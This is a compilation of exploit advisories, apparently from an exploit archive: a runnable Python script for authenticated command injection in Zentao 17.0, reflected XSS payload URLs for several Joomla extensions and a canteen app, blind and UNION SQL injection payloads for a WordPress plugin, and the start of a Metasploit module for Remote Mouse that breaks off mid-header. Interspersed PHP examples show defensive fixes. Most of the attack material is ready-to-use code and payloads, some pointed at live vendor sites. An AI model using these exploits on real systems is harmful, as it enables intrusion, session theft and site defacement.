<pre><code># Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution<br /># Exploit Author: mister0xf <br /># Date: 2022-10-8<br /># Software Link: https://github.com/easysoft/zentaopms<br /># Version: tested on 17.0 (probably works also on newer/older versions)<br /># Tested On: Kali Linux 2022.2<br /># Exploit Tested Using: Python 3.10.4<br /># Vulnerability Description:<br /># Zentao Project Management System 17.0 suffers from an authenticated command injection allowing <br /># remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver <br /><br /># Vulnerable Source Code:<br /># /module/repo/model.php:<br /># [...]<br /># $client = $this->post->client; // <-- client is taken from the POST request<br /># [...]<br /># elseif($scm == 'Git')<br /># {<br /># if(!is_dir($path))<br /># {<br /># dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);<br /># return false;<br /># }<br />#<br /># if(!chdir($path))<br /># {<br /># if(!is_executable($path))<br /># {<br /># dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);<br /># return false;<br /># }<br /># dao::$errors['path'] = $this->lang->repo->error->path;<br /># return false;<br /># }<br />#<br /># $command = "$client tag 2>&1"; // <-- command is injected here<br /># exec($command, $output, $result);<br /><br />import requests,sys<br />import hashlib<br />from urllib.parse import urlparse<br />from bs4 import BeautifulSoup<br /><br />def banner():<br /> print('''<br /> ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: ::::::::<br /> :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+:<br /> +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+<br /> +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+<br /> +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+<br /> #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+#<br />######### ########## ### #### ######## ########### ### ### ########<br /> ''')<br />def usage():<br /> print('Usage: zenciao user 
password http://127.0.0.1/path')<br /> <br />def main():<br /><br /> if ((len(sys.argv)-1) != 3):<br /> usage()<br /> banner()<br /> exit()<br /><br /> #proxy = {'http':'http://127.0.0.1:8080'}<br /><br /> banner()<br /> username = sys.argv[1] <br /> password = sys.argv[2] <br /> target = sys.argv[3]<br /><br /> # initialize session object<br /> session = requests.session()<br /> <br /> home_url = target+'/index.php'<br /> rand_url = target+'/index.php?m=user&f=refreshRandom&t=html'<br /> login_url = target+'/index.php?m=user&f=login&t=html'<br /> create_repo_url = target+'/index.php?m=repo&f=create&objectID=0'<br /><br /> r1 = session.get(home_url)<br /> soup = BeautifulSoup(r1.text, "html.parser")<br /> script_tag = soup.find('script')<br /> redirect_url = script_tag.string.split("'")[1]<br /> r2 = session.get(target+redirect_url)<br /><br /> # get random value<br /> session.headers.update({'X-Requested-With': 'XMLHttpRequest'})<br /> res = session.get(rand_url)<br /> rand = res.text<br /><br /> # compute md5(md5(password)+rand)<br /> md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode())<br /><br /> # login request<br /> post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""}<br /> my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html'<br /> session.headers.update({'Referer': my_referer})<br /> session.headers.update({'X-Requested-With': 'XMLHttpRequest'})<br /> response = session.post(login_url, data=post_data) <br /><br /> # exploit rce<br /> # devops repo page<br /> r2 = session.get(create_repo_url)<br /> git_test_dir = '/home/'<br /> command = 'whoami;'<br /> exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""}<br /> r3 = session.post(create_repo_url, data=exploit_post_data)<br /> print(r3.content)<br /><br />if 
__name__ == '__main__':<br /> main()<br /><br /><br /><br /><br /></code></pre>
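<p>Added example (not ZenTao's code and not the project's actual fix): one way to close the injection shown in the vulnerable <code>model.php</code> excerpt above is to accept the posted <code>client</code> value only when it resolves to an allowlisted git binary, and to start that binary without a shell. The allowlist <code>ALLOWED_GIT_CLIENTS</code> and the functions <code>resolveGitClient</code> and <code>listGitTags</code> are assumptions made for illustration; the array form of <code>proc_open</code> needs PHP 7.4 or later.</p>

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the only binaries an administrator accepts as the SCM client.
const ALLOWED_GIT_CLIENTS = ['/usr/bin/git', '/usr/local/bin/git'];

/**
 * Map the posted "client" value to an allowlisted binary, or return null.
 * Anything that is not exactly the path of an allowlisted executable is refused,
 * so a value such as "whoami;" never reaches a command line.
 */
function resolveGitClient(string $client, array $allowed = ALLOWED_GIT_CLIENTS): ?string
{
    if ($client === '' || strpos($client, "\0") !== false) {
        return null;
    }
    // realpath() returns false unless the whole string names an existing path.
    $real = realpath($client);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return null;
    }
    foreach ($allowed as $candidate) {
        // Compare canonical paths so a symlinked /usr/bin/git still matches.
        if (realpath($candidate) === $real) {
            return $real;
        }
    }
    return null;
}

/**
 * Replacement for: $command = "$client tag 2>&1"; exec($command, $output, $result);
 * The argv array is handed to the binary directly, so no shell parses the input.
 */
function listGitTags(string $client, string $repoPath): array
{
    $binary = resolveGitClient($client);
    if ($binary === null) {
        throw new InvalidArgumentException('client is not an allowlisted git binary');
    }
    if (!is_dir($repoPath)) {
        throw new InvalidArgumentException('repository path is not a directory');
    }

    $pipes = [];
    $spec  = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc  = proc_open([$binary, 'tag'], $spec, $pipes, $repoPath);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start git');
    }
    $stdout = stream_get_contents($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    if (proc_close($proc) !== 0) {
        throw new RuntimeException('git tag failed: ' . trim((string) $stderr));
    }
    // One tag per line; drop the empty trailing element.
    return array_values(array_filter(
        explode("\n", (string) $stdout),
        static fn (string $line): bool => $line !== ''
    ));
}

// Constructed inputs: the first is the "client" value sent in the advisory's request,
// the second is a real executable that is simply not on the allowlist.
foreach (['whoami;', '/bin/sh', '/usr/bin/git'] as $posted) {
    printf(
        "%-16s => %s\n",
        var_export($posted, true),
        resolveGitClient($posted) === null ? 'rejected' : 'accepted'
    );
}
```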
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │<br />│ Software : Joomla Vik Booking 1.15.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /index.php/en/booking<br /><br />GET parameter 'categories' is vulnerable to XSS<br /><br />https://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103<br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi<br /># Date: 14-08-2022<br /># Exploit Author: Rizacan Tufan<br /># Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated<br /># Software Link: https://wordpress.org/plugins/zephyr-project-manager/<br /># Vendor Homepage: https://zephyr-one.com/<br /># Version: 3.2.42<br /># Tested on: Windows, Linux<br /># CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)<br /><br /># Description<br /><br />Zephyr Project Manager is a plug-in that helps you manage all your projects and tasks and get things done effectively.<br /><br />It has been determined that data coming from input fields in most places throughout the application is used in<br />queries without any sanitization or validation.<br /><br />The details of the discovery are given below.<br /><br /># Proof of Concept (PoC)<br /><br />The details of the various SQL injections in the application are given below.<br /><br />## Endpoint of Get Project Data.<br /><br />Sample Request :<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: vuln.local<br />Cookie: ...<br />...<br />Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_projects<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 74<br />Origin: https://vuln.local<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br /><br />action=zpm_view_project&project_id=1&zpm_nonce=22858bf3a7<br /><br />Payload :<br /><br />---<br />Parameter: project_id (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: action=zpm_view_project&project_id=1 AND 4923=4923&zpm_nonce=22858bf3a7<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)<br /> Payload: action=zpm_view_project&project_id=1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=22858bf3a7<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 20 columns<br /> Payload: action=zpm_view_project&project_id=-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=22858bf3a7<br />---<br /><br /><br />## Endpoint of Get Task Data.<br /><br />Sample Request :<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: vuln.local<br />Cookie: ...<br />...<br />Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 51<br />Origin: https://vuln.local<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br /><br />task_id=1&action=zpm_view_task&zpm_nonce=22858bf3a7<br /><br />Payload :<br /><br />---<br />Parameter: task_id (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: task_id=1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=zpm_view_task&zpm_nonce=22858bf3a7<br />---<br /><br />## Endpoint of New Task.<br /><br />Sample Request :<br /><br />POST /wp-admin/admin-ajax.php HTTP/2<br />Host: vuln.local<br />Cookie: ...<br />...<br />Referer: https://vuln.local/wp-admin/admin.php?page=zephyr_project_manager_tasks<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 337<br />Origin: https://vuln.local<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br /><br />task_name=test&task_description=test&task_project=1&task_due_date=&task_start_date=&team=0&priority=priority_none&status=test&type=default&recurrence%5Btype%5D=default&parent-id=-1&action=zpm_new_task&zpm_nonce=22858bf3a7<br /><br />Payload :<br /><br />---<br />Parameter: task_project (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: task_name=test&task_description=test&task_project=1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=&task_start_date=&team=0&priority=priority_none&status=rrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=default&recurrence[type]=default&parent-id=-1&action=zpm_new_task&zpm_nonce=22858bf3a7<br />---<br /><br /><br /></code></pre>
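<p>Added example (not the plugin's code): the three findings above share one pattern, an ID parameter (<code>project_id</code>, <code>task_id</code>, <code>task_project</code>) that reaches the SQL text unvalidated. The sketch below contrasts string concatenation with integer validation plus a bound parameter, using PDO and a constructed in-memory SQLite table so it runs offline (requires the <code>pdo_sqlite</code> extension). Inside WordPress the same idea is <code>absint()</code> together with <code>$wpdb->prepare()</code> and a <code>%d</code> placeholder. Table, data and function names are assumptions.</p>

```php
<?php
declare(strict_types=1);

// Constructed in-memory table standing in for the plugin's project table.
function demoDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE projects (id INTEGER PRIMARY KEY, name TEXT)');
    $pdo->exec("INSERT INTO projects (id, name) VALUES (1, 'alpha'), (2, 'beta')");
    return $pdo;
}

// Before: the request value becomes part of the SQL text, which is the pattern
// the advisory describes. Whatever follows the number is parsed as SQL.
function viewProjectConcat(PDO $pdo, string $projectId): array
{
    $sql = "SELECT id, name FROM projects WHERE id = $projectId";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// After: the value must be a positive integer, and it is sent as a bound
// parameter, so it can only ever be compared as data.
function viewProjectBound(PDO $pdo, string $projectId): array
{
    $id = filter_var($projectId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('project_id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT id, name FROM projects WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo      = demoDb();
$fromPage = '1 AND 4923=4923'; // boolean-based project_id value quoted in the advisory

// Concatenated query: the database accepts the extra predicate as SQL.
printf("concat accepted the value, rows returned: %d\n", count(viewProjectConcat($pdo, $fromPage)));

// Validated and bound query: the same value is refused before any SQL runs.
try {
    viewProjectBound($pdo, $fromPage);
} catch (InvalidArgumentException $e) {
    printf("bound  rejected the value: %s\n", $e->getMessage());
}

// A legitimate ID still works.
printf("bound  with '1': %s\n", json_encode(viewProjectBound($pdo, '1')));
```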
<pre><code>Author : CraCkEr<br />Website : extensions.joomla.org<br />Vendor : Heiner Klostermann - kiss-software.de<br />Software : Joomla KSAdvertiser 2.5.37<br />Vuln Type: Reflected XSS<br />Method : GET<br />Impact : Manipulate the content of the site<br /><br />Path: /index.php<br /><br />GET parameter 'fSpS' is vulnerable to XSS<br /><br />https://www.kiss-software.de/index.php?option=com_ksadvertiser&view=items&Itemid=0&filtercat=50&fSpS=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&lang=en<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Author : CraCkEr<br />Website : extensions.joomla.org<br />Vendor : Joomla JoomBri Careers 3.3.0<br />Software : JoomBri Team<br />Vuln Type: Reflected XSS<br />Method : GET<br />Impact : Manipulate the content of the site<br /><br />Path: /for-jobseekers/search-jobs<br /><br />GET parameter 'keyword' is vulnerable to XSS<br /><br />https://target.com/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3d%22alert(1)%22autofocus%3d%22ak5aghi5u9p&location_id=2&jobtype_id=1&industry_id%5B%5D=2&functional_id%5B%5D=2&education_id%5B%5D=2&limit=20&option=com_career&task=<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Author : CraCkEr<br />Website : extensions.joomla.org<br />Vendor : Joomla JoomBri Freelance 4.5.0<br />Software : JoomBri Team<br />Vuln Type: Reflected XSS<br />Method : GET<br />Impact : Manipulate the content of the site<br /><br />Path: /index.php<br /><br />GET parameter 'keyword' is vulnerable to XSS<br /><br />https://target.com/index.php?keyword=xfz9b%22onfocus%3d%22alert(1)%22autofocus%3d%22nyn0r<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Canteen-Management-1.0-2022 suffers from XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 10.04.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management<br /><br /><br />## Description:<br />Canteen-Management-1.0-2022 suffers from a reflected XSS vulnerability.<br />The name of an arbitrarily supplied URL parameter is copied into the<br />value of an HTML tag attribute which is encapsulated in double<br />quotation marks.<br />The attacker can craft a very malicious HTTPS URL redirecting to a<br />very malicious URL. When the victim clicks on this crafted URL, the<br />game will be over for him.<br /><br /><br />STATUS: High vulnerability<br /><br />[+]Payload REQUEST:<br /><br />```HTML<br />GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me HTTP/1.1<br />Host: pwnedhost.com<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google 
Chrome";v="106", "Chromium";v="106"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />```<br /><br />[+]Payload RESPONSE:<br /><br />```burp<br />HTTP/1.1 200 OK<br />Date: Tue, 04 Oct 2022 09:44:55 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6<br />X-Powered-By: PHP/8.1.6<br />Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 6140<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br /><link rel="stylesheet" href="assets/css/popup_style.css"><br /> <style><br />.footer1 {<br /> position: fixed;<br /> bottom: 0;<br /> width: 100%;<br /> color: #5c4ac7;<br /> text-align: center;<br />}<br /><br /></style><br /> <!DOCTYPE html><br /><html lang="en"><br /><br /><head><br /> <meta charset="utf-8"><br /> <meta http-equiv="X-UA-Compatible" content="IE=edge"><br /><br /><meta charset="utf-8"><br /><meta name="viewport" content="width=device-width, initial-scale=1.0,<br />user-scalable=0, minimal-ui"><br /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><br /><meta name="description" content=""><br /><meta name="keywords" content=""><br /><meta name="author" content=""><br /><br /> <link rel="icon" type="image/png" sizes="16x16"<br />href="assets/uploadImage/Logo/favicon.png"><br /><br /><br /><br /><br /><br /> <style type="text/css"><br />@media print {<br /> #printbtn {<br /> display : none;<br /> }<br />}<br /></style><br /> <title>Youthappam Canteen Management System - by Mayuri K.<br />Freelancer</title><br /><br /> <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet"><br /> <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" /><br /> <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet" /><br /><br /> <link href="assets/css/lib/bootstrap/bootstrap.min.css" rel="stylesheet"><br /><br /> <link 
href="assets/css/helper.css" rel="stylesheet"><br /> <link href="assets/css/style.css" rel="stylesheet"><br /> <link rel="stylesheet"<br />href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" /><br /> <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet"><br /> <link href="assets/css/lib/calendar2/pignose.calendar.min.css"<br />rel="stylesheet"><br /> <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet"><br /> <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"<br />rel="stylesheet"><br /><br /><br /> <script type="text/javascript"<br />src="https://www.gstatic.com/charts/loader.js"></script><br /> <script type="text/javascript"><br /> google.charts.load("current", {packages:["corechart"]});<br /> google.charts.setOnLoadCallback(drawChart);<br /> function drawChart() {<br /> var data = google.visualization.arrayToDataTable([<br /> ['Food', 'Average sale per Day'],<br /> ['Masala dosa', 11],<br /> ['Chicken 65 ', 2],<br /> ['Karapu Boondi', 2],<br /> ['Bellam Gavvalu', 2],<br /> ['Gummadikaya Vadiyalu', 7]<br /> ]);<br /><br /> var options = {<br /> title: 'Food Average Sale per Day',<br /> pieHole: 0.4,<br /> };<br /><br /> var chart = new<br />google.visualization.PieChart(document.getElementById('donutchart'));<br /> chart.draw(data, options);<br /> }<br /> </script><br /></head><br /><br /><body class="fix-header fix-sidebar"><br /><br /><div id="page"></div><br /><div id="loading"></div><br /><br /><br /><br /><br /><br /> <div id="main-wrapper"><br /> <div class="unix-login"><br /><br /> <div class="container-fluid" style="background-image:<br />url('assets/myimages/background.jpg');<br /> background-color: #ffffff;background-size:cover"><br /> <div class="row"><br /> <div class="col-lg-4 ml-auto"><br /> <div class="login-content"><br /> <div class="login-form"><br /> <center><img<br />src="./assets/uploadImage/Logo/logo.png" style="width:<br />100%;"></center><br><br /> <form<br 
/>action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"<br />target="_blank" rel="noopener nofollow ugc"> <img<br />src="https:/raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"<br />method="post" id="loginForm"><br /> <div class="form-group"><br /><br /> <input type="text"<br />name="username" id="username" class="form-control"<br />placeholder="Username" required=""><br /><br /> </div><br /> <div class="form-group"><br /><br /> <input type="password"<br />id="password" name="password" class="form-control"<br />placeholder="Password" required=""><br /> </div><br /><br /><br /> <button type="submit" name="login"<br />class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign<br />in</button><br /><br /> <!-- <div class="forgot-phone<br />text-right f-right"><br /><a href="#" class="text-right f-w-600"> Forgot Password?</a><br /></div> --><br /><br /><div class="forgot-phone text-left f-left"><br /><a href = "mailto:mayuri.infospace@gmail.com?subject = Project<br />Development Requirement&body = I saw your projects. 
I want to develop<br />a project" class="text-right f-w-600"> Click here to contact me</a><br /></div><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /><br /><br /><br /><br /> <script src="./assets/js/lib/jquery/jquery.min.js"></script><br /><br /> <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script><br /> <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script><br /><br /> <script src="./assets/js/jquery.slimscroll.js"></script><br /><br /> <script src="./assets/js/sidebarmenu.js"></script><br /><br /> <script src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script><br /><br /> <script src="./assets/js/custom.min.js"></script><br /> <script><br /><br />function onReady(callback) {<br /> var intervalID = window.setInterval(checkReady, 1000);<br /> function checkReady() {<br /> if (document.getElementsByTagName('body')[0] !== undefined) {<br /> window.clearInterval(intervalID);<br /> callback.call(this);<br /> }<br /> }<br />}<br /><br />function show(id, value) {<br /> document.getElementById(id).style.display = value ? 'block' : 'none';<br />}<br /><br />onReady(function () {<br /> show('page', true);<br /> show('loading', false);<br />});<br /> </script><br /></body><br /><br /></html><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/emg0zo)<br /><br />## More:<br />[href](https://www.nu11secur1ty.com/)<br /><br /><br /><br />Done:<br /><br /><br />On Tue, 4.10.2022 at 23:24, nu11 secur1ty <nu11secur1typentest@gmail.com><br />wrote:<br /><br />> Tomorrow I will send to you. BR<br />><br />> On Tue, Oct 4, 2022, 19:11 Packet Storm <packet@packetstormsecurity.com><br />> wrote:<br />><br />>> Missing submission<br />>><br />>> On Tue, Oct 04, 2022 at 02:23:16PM +0300, nu11 secur1ty wrote:<br />>> ><br />>> https://www.nu11secur1ty.com/2022/10/example-of-professional-penetration.html<br />>> ><br />>> https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management<br />>> > --<br />>> > System Administrator - Infrastructure Engineer<br />>> > Penetration Testing Engineer<br />>> > Exploit developer at https://packetstormsecurity.com/<br />>> > https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />>> > home page: https://www.nu11secur1ty.com/<br />>> > hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br />>> > nu11secur1ty <http://nu11secur1ty.com/><br />>><br />><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
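<p>Added example (not the application's code): the response above shows the request path reflected into <code>&lt;form action="..."&gt;</code> without encoding, which is what a script produces when it echoes <code>$_SERVER['PHP_SELF']</code>; that the application does exactly this is an assumption. The same attribute encoding applies to the reflections of <code>categories</code>, <code>fSpS</code> and <code>keyword</code> in the Joomla advisories above. Function names and sample values are constructed.</p>

```php
<?php
declare(strict_types=1);

// Before: everything after "login.php" in the request path is caller-controlled
// and lands inside the double-quoted attribute verbatim.
function formOpenUnsafe(string $phpSelf): string
{
    return '<form action="' . $phpSelf . '" method="post" id="loginForm">';
}

// Encode a value for use inside a quoted HTML attribute: quotes, angle brackets
// and ampersands become entities, invalid UTF-8 is replaced instead of dropped.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// After, option 1: keep reflecting the path, but encode it for the attribute.
function formOpenEncoded(string $phpSelf): string
{
    return '<form action="' . attr($phpSelf) . '" method="post" id="loginForm">';
}

// After, option 2: do not reflect the request path at all. SCRIPT_NAME is the
// script's own path and carries no trailing path info.
function formOpenFixed(array $server): string
{
    return '<form action="' . attr($server['SCRIPT_NAME'] ?? '') . '" method="post" id="loginForm">';
}

// The same helper for a reflected search term, as in the "keyword" findings.
function searchInput(string $keyword): string
{
    return '<input type="text" name="keyword" value="' . attr($keyword) . '">';
}

// Constructed request data with a harmless marker that breaks out of the attribute.
$server = [
    'PHP_SELF'    => '/youthappam/login.php/x"><b>injected</b>',
    'SCRIPT_NAME' => '/youthappam/login.php',
];

echo "unsafe : ", formOpenUnsafe($server['PHP_SELF']), "\n";  // markup escapes the attribute
echo "encoded: ", formOpenEncoded($server['PHP_SELF']), "\n"; // stays inside the attribute
echo "fixed  : ", formOpenFixed($server), "\n";               // path info never reflected
echo "input  : ", searchInput('x" data-probe="1'), "\n";      // quote cannot close value=""
```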
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = NormalRanking<br /><br /> include Exploit::Remote::Tcp<br /> include Exploit::EXE # generate_payload_exe<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Remote Mouse RCE',<br /> 'Description' => %q{<br /> This module utilizes the Remote Mouse Server by Emote Interactive protocol<br /> to deploy a payload and run it from the server. This module will only deploy<br /> a payload if the server is set without a password (default).<br /> Tested against 4.110, current at the time of module writing<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> '0RPHON', # discovery, edb module<br /> 'H4rk3nz0' # poc2<br /> ],<br /> 'References' => [<br /> [ 'EDB', '46697' ],<br /> [ 'CVE', '2022-3365' ],<br /> [ 'URL', 'https://www.remotemouse.net/' ],<br /> [ 'URL', 